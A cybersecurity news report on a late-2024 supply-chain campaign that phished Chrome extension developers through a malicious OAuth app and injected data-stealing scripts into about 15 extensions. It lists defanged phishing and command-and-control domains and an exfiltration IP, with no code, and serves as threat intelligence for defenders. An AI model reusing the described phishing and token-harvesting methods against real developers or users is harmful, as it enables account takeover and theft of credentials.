A sophisticated supply chain attack targeting Chrome browser extensions has come to light, potentially compromising hundreds of thousands of users.
The attack, which unfolded in December 2024, involved phishing campaigns aimed at extension developers and the injection of malicious code into legitimate Chrome extensions.
Sensitive user data, including API keys, session cookies, and authentication tokens from services like ChatGPT and Facebook for Business, was exfiltrated.
Investigations revealed that the threat actor had been active since at least 2023 and shifted tactics in late 2024 from distributing fake extensions to compromising legitimate ones through phishing and malicious OAuth applications.
Phishing Campaign Targeting Developers
The attackers launched a targeted phishing campaign against Chrome extension developers.
Spear-phishing emails were crafted to appear as official notifications from the Chrome Web Store, urging developers to authorize access to a malicious OAuth application named “Privacy Policy Extensions.”
These emails were sent from domains such as chromeforextension[.]com and,supportchromestore[.]com which mimicked legitimate Google services.
Once developers granted permissions to the malicious OAuth app, the attackers gained control over their extensions.
This allowed them to upload compromised versions containing malicious code to the Chrome Web Store.
The phishing emails redirected victims to adversary-controlled domains (e.g., checkpolicy[.]site), which eventually led to legitimate Google login pages for credential harvesting.
Compromised Extensions and Malicious Code
Approximately 15 Chrome extensions were compromised during this campaign, including popular tools like Proxy SwitchyOmega, GraphQL Network Inspector, and VidHelper Video Download Helper.
The malicious code injected into these extensions consisted of two primary scripts:
background.js: Operated in the background to exfiltrate sensitive data such as API keys and authentication tokens. It fetched configuration files from command-and-control (C2) servers and targeted specific platforms like ChatGPT and Facebook Business.context_responder.js: Injected into all visited web pages to interact with browser URLs and harvest credentials based on patterns specified in configuration files hosted on C2 servers.
According to the Sekoia, the attackers used a well-coordinated infrastructure involving multiple domains registered via Namecheap and hosted on AS20473 (VULTR).
Phishing domains chromeforextension[.]com were used for initial access, while C2 servers such as graphqlnetwork[.]pro hosted configuration files and were used by the malicious scripts.
Data exfiltration occurred via subdomains hosted at,149.248.2[.]160 where a MySQL database likely stored the harvested data.
The infrastructure also included domains linked to earlier campaigns involving fake Chrome extensions distributed through SEO poisoning or malvertising since at least December 2023
This supply chain attack underscores the significant risks posed by compromised browser extensions, particularly when sensitive platforms like ChatGPT and Facebook Business are targeted.
The attacker’s shift from distributing fake extensions to compromising legitimate ones demonstrates evolving tactics in cybercrime.
Organizations and individual users must adopt robust security practices to mitigate such threats, including vigilance against phishing campaigns and proactive monitoring of browser activity.
This incident serves as a stark reminder of the vulnerabilities inherent in software supply chains and the importance of securing developer ecosystems against targeted attacks.